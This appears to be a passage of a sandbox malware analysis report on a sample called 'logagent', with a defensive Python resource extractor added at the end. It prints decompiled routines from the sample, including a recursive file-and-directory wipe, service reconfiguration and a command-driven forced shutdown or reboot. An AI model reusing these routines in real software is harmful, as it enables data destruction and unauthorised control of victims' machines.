                                  					_push(0x401);
                                  					L4:
                                  					return  *0x4154e0(_a4);
                                  				}
                                  				_push(_a16);
                                  				_push(_a12);
                                  				_push(_a8);
                                  				goto L4;
                                  			}

                                  APIs
                                  • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 105555FB
                                  • GetCursorPos.USER32(?), ref: 10555626
                                  • SetForegroundWindow.USER32(?), ref: 1055562F
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 1055564A
                                  • Shell_NotifyIcon.SHELL32(00000002,0041C200), ref: 1055569B
                                  • ExitProcess.KERNEL32 ref: 105556A3
                                  • CreatePopupMenu.USER32 ref: 105556AB
                                  • AppendMenuA.USER32(00000000,00000000,00000000,00416E0C), ref: 105556C0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                  • String ID:
                                  • API String ID: 1665278180-0
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3dfe655d3348a41d087801d026eedf30f6bfd104846c7bc97f2f15676f37ca44
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 8521F531580649FBEB119FA4ED19BCA3F25EB0874AF608421F205E40B1C7B199A8AB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00411927(void* _a4, signed char _a20) {
                                  				short* _t6;
                                  				signed int _t9;
                                  				void* _t14;
                                  				short* _t17;
                                  				int _t19;
                                  				void* _t21;
                                  				void* _t22;
                                  
                                  				_t17 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 2);
                                  				_t22 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t21 = OpenServiceW(_t22, _t6, 2);
                                  				if(_t21 != 0) {
                                  					_t19 =  &_a4 | 0xffffffff;
                                  					_t9 = _a20 & 0x000000ff;
                                  					if(_t9 == 0) {
                                  						_push(4);
                                  						goto L8;
                                  					} else {
                                  						_t14 = _t9 - 1;
                                  						if(_t14 == 0) {
                                  							_push(2);
                                  							goto L8;
                                  						} else {
                                  							if(_t14 == 1) {
                                  								_push(3);
                                  								L8:
                                  								_pop(_t19);
                                  							}
                                  						}
                                  					}
                                  					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                  					CloseServiceHandle(_t22);
                                  					CloseServiceHandle(_t21);
                                  				} else {
                                  					CloseServiceHandle(_t22);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t17;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E00411700(void* _a4) {
                                   				short* _t5;
                                   				signed int _t12;
                                   				void* _t15;
                                   				void* _t16;
                                   
                                   				// Starts a service by name. The name arrives as a std::wstring; c_str() is
                                   				// called through the MSVCP60 import and its result (eax) is what the
                                   				// decompiler then shows as _t5 in the OpenServiceW call.
                                   				_t12 = 0;
                                   				_t5 = OpenSCManagerW(0, 0, 0x10);	// local SCM, default database; 0x10 = SC_MANAGER_QUERY_LOCK_STATUS
                                   				_t16 = _t5;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();	// std::wstring::c_str() -> service name
                                   				_t15 = OpenServiceW(_t16, _t5, 0x10);	// 0x10 = SERVICE_START
                                   				if(_t15 != 0) {
                                   					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;	// 1 only when StartServiceW succeeded (an already-running service yields 0 here)
                                   					CloseServiceHandle(_t16);
                                   					CloseServiceHandle(_t15);
                                   				} else {
                                   					CloseServiceHandle(_t16);	// OpenServiceW failed: only the SCM handle is open
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();	// std::wstring destructor
                                   				return _t12;
                                   			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,0041130D), ref: 0041170C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                  • String ID:
                                  • API String ID: 3595611540-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 0126697ef4a7dd551ba317b87bbb1749c3aaf445346a94cf1b379eb6c3c08625
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 04F06D71110528FFD3106FB1EC88DFF3F6CEE893A47044025F90692160CB749E869AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getenv.MSVCRT ref: 10548EE7
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 10548F3C
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 10548F56
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,00415F68,?,?,?), ref: 10549055
                                  • GetLastError.KERNEL32(?,?,?,?,?,00415F68,?,?,?), ref: 1054905F
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,00415F68,?,?,?), ref: 1054907B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$DeleteErrorFirstLastgetenv
                                  • String ID:
                                  • API String ID: 1175699397-0
                                  • Opcode ID: 762876c4cb8c431da415acefb625b23a52fb379620e5f1e116059fae03045a50
                                  • Instruction ID: 582dd4586e61b690f4aadafe48ddf496447afc1134be1f8fe9c4cbc92b36900d
                                  • Opcode Fuzzy Hash: 762876c4cb8c431da415acefb625b23a52fb379620e5f1e116059fae03045a50
                                  • Instruction Fuzzy Hash: 73619E3190064EEBCB00ABA0DC9DAEEBFBDEF45355F104161E912D31A0EB715A8ECB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                   			E1055457D(intOrPtr _a4) {
                                   				signed char _v5;
                                   				void* _v12;
                                   				short _v532;
                                   				short _v1052;
                                   				struct _WIN32_FIND_DATAW _v1644;
                                   				void* _t46;
                                   				intOrPtr* _t73;
                                   				intOrPtr* _t82;
                                   				intOrPtr* _t83;
                                   
                                   				// Recursive directory wipe; _a4 is a directory path. _t83 and _t82 are
                                   				// string copy/append routines called through import pointers (0x4153b4,
                                   				// 0x4153a0); the literals they append (0x416a54, 0x415a24) are not
                                   				// resolved in this listing.
                                   				_t83 =  *0x4153b4;
                                   				 *_t83( &_v1052, _a4);
                                   				_t82 =  *0x4153a0;
                                   				 *_t82( &_v1052, 0x416a54);	// _v1052 = search pattern for FindFirstFileW
                                   				 *_t83( &_v532, _a4);
                                   				 *_t82( &_v532, 0x415a24);	// _v532 = path prefix for each entry
                                   				_t46 = FindFirstFileW( &_v1052,  &_v1644);
                                   				_v12 = _t46;
                                   				if(_t46 == 0xffffffff) {	// INVALID_HANDLE_VALUE
                                   					L18:
                                   					return 0;
                                   				}
                                   				 *_t83( &_v1052,  &_v532);	// keep a copy of the prefix, restored after each entry
                                   				_t73 =  *0x415168;	// directory-removal routine via import pointer (not resolved here)
                                   				_v5 = 1;
                                   				// Note: the entry returned by FindFirstFileW itself is never examined;
                                   				// the loop starts with FindNextFileW.
                                   				do {
                                   					if(FindNextFileW(_v12,  &_v1644) == 0) {
                                   						if(GetLastError() != 0x12) {	// 0x12 = ERROR_NO_MORE_FILES
                                   							L17:
                                   							FindClose(_v12);
                                   							goto L18;
                                   						}
                                   						_v5 = _v5 & 0x00000000;	// enumeration finished: leave the loop
                                   						goto L14;
                                   					}
                                   					if(E10554549( &(_v1644.cFileName)) != 0) {	// name filter (body not in this listing)
                                   						goto L14;
                                   					}
                                   					 *_t82( &_v532,  &(_v1644.cFileName));	// prefix + entry name
                                   					if((_v1644.dwFileAttributes & 0x00000010) == 0) {	// 0x10 = FILE_ATTRIBUTE_DIRECTORY
                                   						if((_v1644.dwFileAttributes & 0x00000001) != 0) {	// 0x1 = FILE_ATTRIBUTE_READONLY
                                   							SetFileAttributesW( &_v532, 0x80);	// 0x80 = FILE_ATTRIBUTE_NORMAL, so DeleteFileW can succeed
                                   						}
                                   						if(DeleteFileW( &_v532) == 0) {
                                   							goto L17;	// any failed delete aborts the whole walk
                                   						} else {
                                   							L7:
                                   							 *_t83( &_v532,  &_v1052);	// restore the prefix
                                   							goto L14;
                                   						}
                                   					}
                                   					if(E1055457D( &_v532) == 0) {	// subdirectory: recurse
                                   						goto L17;
                                   					}
                                   					 *_t73( &_v532);	// remove the now-empty subdirectory
                                   					goto L7;
                                   					L14:
                                   				} while (_v5 != 0);
                                   				FindClose(_v12);
                                   				return  *_t73(_a4);	// finally remove the directory itself
                                   			}

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 105545DA
                                  • FindNextFileW.KERNEL32(10545F55,?), ref: 10554612
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 10554693
                                  • DeleteFileW.KERNEL32(?), ref: 105546A0
                                  • GetLastError.KERNEL32 ref: 105546AC
                                  • FindClose.KERNEL32(10545F55), ref: 105546C8
                                  • FindClose.KERNEL32(10545F55), ref: 105546DB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$Close$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 1899391700-0
                                  • Opcode ID: 1cba246bc881a566288f4ba8d1b2c1b722db2d7294ca736c60c7400bc1a36b4e
                                  • Instruction ID: ccb0687570c2fee638a1422efabf09f102552a5550201e5eff52d51d27d76280
                                  • Opcode Fuzzy Hash: 1cba246bc881a566288f4ba8d1b2c1b722db2d7294ca736c60c7400bc1a36b4e
                                  • Instruction Fuzzy Hash: AE412772D4421CAADB11DBA0DC88BCA7FBDEB45258F1045A6E504E3050EBB19AD88F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                   			E0040EC0F() {
                                   				void* _v8;
                                   				intOrPtr _v12;
                                   				struct _TOKEN_PRIVILEGES _v24;
                                   				signed int _t14;
                                   
                                   				// Enables SeShutdownPrivilege in the current process token (required before ExitWindowsEx).
                                   				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);	// 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
                                   				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));	// fills Privileges[0].Luid
                                   				_v24.PrivilegeCount = 1;
                                   				_v12 = 2;	// _v12 overlays Privileges[0].Attributes; 2 = SE_PRIVILEGE_ENABLED
                                   				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                   				_t14 = GetLastError();	// AdjustTokenPrivileges can return TRUE yet set ERROR_NOT_ALL_ASSIGNED (1300) when the token does not hold the privilege
                                   				asm("sbb eax, eax");
                                   				return  ~( ~_t14);	// result derived from GetLastError(); the token handle is never closed
                                   			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                  • GetLastError.KERNEL32 ref: 0040EC5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                  • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                  • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getenv.MSVCRT ref: 10548C68
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 10548CBD
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 10548CD7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileFirstgetenv
                                  • String ID:
                                  • API String ID: 41612390-0
                                  • Opcode ID: 23e045838b98cf7888df67748a30d3d3fe5417b4665ba54d6068558ccc242094
                                  • Instruction ID: 0a7370c0ef7a246f1ad01f4d103f94e5a64f5556adf6339adbdaf7091d039bad
                                  • Opcode Fuzzy Hash: 23e045838b98cf7888df67748a30d3d3fe5417b4665ba54d6068558ccc242094
                                  • Instruction Fuzzy Hash: 01714D71C0064EEBCB009BE0DC99AEEBF7CEF55655F104561E912D31A0EB705A8ECB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 27%
                                   			E1054F910(void* __eflags) {
                                   				void* _t13;
                                   				void* _t14;
                                   				_Unknown_base(*)()* _t20;
                                   				int _t24;
                                   				int _t33;
                                   				_Unknown_base(*)()* _t69;
                                   				intOrPtr* _t71;
                                   				void* _t73;
                                   				void* _t76;
                                   
                                   				// Shutdown/reboot/logoff command handler built on ExitWindowsEx; the last two
                                   				// branches instead call a function resolved by name at runtime. E1055059E
                                   				// enables SeShutdownPrivilege first (same body as E0040EC0F). _t71 (import
                                   				// pointer 0x4152c4) is a string-equality helper that returns nonzero on match.
                                   				// The literals at 0x415b14, 0x415908, 0x415b18, 0x415b1c, 0x415b20 and the
                                   				// DLL/export names at 0x41695c/0x41696c are not resolved in this listing.
                                   				_t76 = __eflags;
                                   				E1055059E();
                                   				_t13 = E1054319B(_t73 - 0x10, _t76, 0);	// field 0 of the command (E1054319B body not in this listing)
                                   				_t71 =  *0x4152c4;
                                   				_t14 =  *_t71(_t13, 0x415b14);
                                   				_t77 = _t14;
                                   				if(_t14 == 0) {
                                   					__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415908);
                                   					if(__eflags == 0) {
                                   						__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b18);
                                   						if(__eflags == 0) {
                                   							_t20 = GetProcAddress(LoadLibraryA(0x41695c), 0x41696c);	// runtime-resolved export
                                   							_t69 = _t20;
                                   							__eflags =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b1c);
                                   							if(__eflags == 0) {
                                   								_t24 =  *_t71(E1054319B(_t73 - 0x10, __eflags, 0), 0x415b20);
                                   								__eflags = _t24;
                                   								if(_t24 != 0) {
                                   									_push(0);
                                   									_push(0);
                                   									_push(1);	// resolved function called with (1, 0, 0)
                                   									goto L9;
                                   								}
                                   							} else {
                                   								_push(0);
                                   								_push(0);
                                   								_push(0);	// resolved function called with (0, 0, 0)
                                   								L9:
                                   								 *_t69();	// no NULL check on the GetProcAddress result
                                   							}
                                   						} else {
                                   							E1054319B(_t73 - 0x10, __eflags, 1);	// field 1 of the command
                                   							_t33 = atoi( *0x415344(0)) | 0x00000002;	// 2 = EWX_REBOOT
                                   							__eflags = _t33;
                                   							goto L6;
                                   						}
                                   					} else {
                                   						E1054319B(_t73 - 0x10, __eflags, 1);
                                   						_t33 = atoi( *0x415344(0)) | 0x00000001;	// 1 = EWX_SHUTDOWN
                                   						goto L6;
                                   					}
                                   				} else {
                                   					E1054319B(_t73 - 0x10, _t77, 1);
                                   					_t33 = atoi( *0x415344(0));	// flags taken verbatim from the command (0 = EWX_LOGOFF)
                                   					L6:
                                   					ExitWindowsEx(_t33, ??);	// second argument (dwReason) not recovered by the decompiler
                                   				}
                                   				E1054316C(_t73 - 0x10);
                                   				 *0x415348();
                                   				 *0x415348();
                                   				return 0;
                                   			}

                                  APIs
                                    • Part of subcall function 1055059E: GetCurrentProcess.KERNEL32(00000028,?), ref: 105505AB
                                    • Part of subcall function 1055059E: OpenProcessToken.ADVAPI32(00000000), ref: 105505B2
                                    • Part of subcall function 1055059E: LookupPrivilegeValueA.ADVAPI32(00000000,004169D0,?), ref: 105505C4
                                    • Part of subcall function 1055059E: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 105505E3
                                    • Part of subcall function 1055059E: GetLastError.KERNEL32 ref: 105505E9
                                  • atoi.MSVCRT ref: 1054F948
                                  • atoi.MSVCRT ref: 1054F97C
                                  • ExitWindowsEx.USER32(00000000), ref: 1054F9BC
                                  • LoadLibraryA.KERNEL32(0041695C,0041696C), ref: 1054F9D1
                                  • GetProcAddress.KERNEL32(00000000), ref: 1054F9D8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                   • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessTokenatoi$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                  • String ID:
                                  • API String ID: 2762080774-0
                                  • Opcode ID: bcd75714e71d07cfb2579d6033bc63b97b0b81c53cbe608d0d153417bcfa8dfa
                                  • Instruction ID: b90afeeac3f5e40fabd114fd8f0a6e2e853ea401072efdcd12fc479eee4ea3d7
                                  • Opcode Fuzzy Hash: bcd75714e71d07cfb2579d6033bc63b97b0b81c53cbe608d0d153417bcfa8dfa
                                  • Instruction Fuzzy Hash: CE312276950619EACF049BF4EC9DEEE7B2CEF95295B208826F102E20E1EF746845C714
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			E00409D02(void** _a4) {
                                   				void* _t4;
                                   				long _t5;
                                   				struct HRSRC__* _t7;
                                   
                                   				// Loads the embedded configuration blob: the resource named "SETTINGS" of
                                   				// type 0xa (RT_RCDATA) in the process's own image (hModule 0). The pointer is
                                   				// written through _a4 and the size returned.
                                   				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                   				_t4 = LockResource(LoadResource(0, _t7));	// no check for a missing resource: pointer becomes NULL, size 0
                                   				_t5 = SizeofResource(0, _t7);
                                   				 *_a4 = _t4;
                                   				return _t5;
                                   			}

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                  • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
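Added example, not part of the Joe Sandbox report and not code from the sample: E00409D02 above is the plain FindResourceA / LoadResource / LockResource / SizeofResource sequence for a named RT_RCDATA (type 10) resource, here "SETTINGS", in the module's own image. The Python below performs the same lookup offline by walking the .rsrc directory (type, name, language), so the blob can be pulled from an unpacked PE, or from a mapped memory dump such as the 0x400000 dump referenced in this listing, without executing anything. It returns only the raw bytes; how the sample interprets the blob is not shown here and is not implemented. The build_sample_rsrc helper, the constructed section it produces, and the mapped flag are this example's own assumptions.

```python
import struct
import sys

RT_RCDATA = 10  # the 0xa passed to FindResourceA(0, "SETTINGS", 0xa) in the listing above


def _dir_entries(rsrc, off):
    """Yield (id_or_name_off, is_name, target_off, is_dir) for each entry of the
    IMAGE_RESOURCE_DIRECTORY at `off` (offset relative to the start of .rsrc)."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        yield (name & 0x7FFFFFFF, bool(name & 0x80000000),
               data & 0x7FFFFFFF, bool(data & 0x80000000))


def _read_name(rsrc, off):
    """IMAGE_RESOURCE_DIRECTORY_STRING: u16 length followed by UTF-16LE characters."""
    length = struct.unpack_from("<H", rsrc, off)[0]
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")


def find_named_rcdata(rsrc, rsrc_rva, name, rtype=RT_RCDATA):
    """Resolve type -> name -> first language, as FindResource does, and return the
    resource bytes, or None when no such resource exists. Name matching is
    case-insensitive, like the Win32 API."""
    for rid, is_name, sub, is_dir in _dir_entries(rsrc, 0):
        if is_name or rid != rtype or not is_dir:
            continue
        for nid, n_is_name, sub2, is_dir2 in _dir_entries(rsrc, sub):
            if not (n_is_name and is_dir2) or _read_name(rsrc, nid).upper() != name.upper():
                continue
            for _lang, _, data_off, is_dir3 in _dir_entries(rsrc, sub2):
                if is_dir3:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, not a .rsrc-relative offset
                data_rva, size = struct.unpack_from("<II", rsrc, data_off)
                start = data_rva - rsrc_rva
                return bytes(rsrc[start:start + size])
    return None


def rsrc_section(pe, mapped=False):
    """Return (bytes, rva) of the .rsrc section of a PE image. mapped=True treats
    `pe` as a memory-mapped image starting at the image base (what a sandbox
    memory dump is), where section data sits at its RVA, not at PointerToRawData."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(nsec):
        hdr = table + 40 * i
        sname = pe[hdr:hdr + 8].rstrip(b"\0")
        vsize, rva, rawsize, rawptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if sname == b".rsrc":
            off, length = (rva, vsize) if mapped else (rawptr, rawsize)
            return pe[off:off + length], rva
    raise ValueError("no .rsrc section")


def build_sample_rsrc(blob, rsrc_rva=0x10000):
    """Constructed .rsrc section holding a single RT_RCDATA resource named
    SETTINGS, so the walker can be exercised offline. Not taken from the sample.
    Layout: root dir 0x00, type dir 0x18, name dir 0x30, data entry 0x48,
    name string 0x58, blob 0x70."""
    root = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000018)
    tdir = struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", 0x80000058, 0x80000030)
    ndir = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0x0409, 0x48)
    dent = struct.pack("<IIII", rsrc_rva + 0x70, len(blob), 0, 0)
    sname = struct.pack("<H", 8) + "SETTINGS".encode("utf-16-le")
    sec = root + tdir + ndir + dent + sname  # 0x6A bytes so far
    return sec + b"\0" * (0x70 - len(sec)) + blob, rsrc_rva


if __name__ == "__main__":
    # usage: extract_settings.py <pe-or-mapped-dump> [--mapped]
    data = open(sys.argv[1], "rb").read()
    sec, rva = rsrc_section(data, mapped="--mapped" in sys.argv[2:])
    blob = find_named_rcdata(sec, rva, "SETTINGS")
    print("not found" if blob is None else f"SETTINGS: {len(blob)} bytes, head {blob[:16].hex()}")
```

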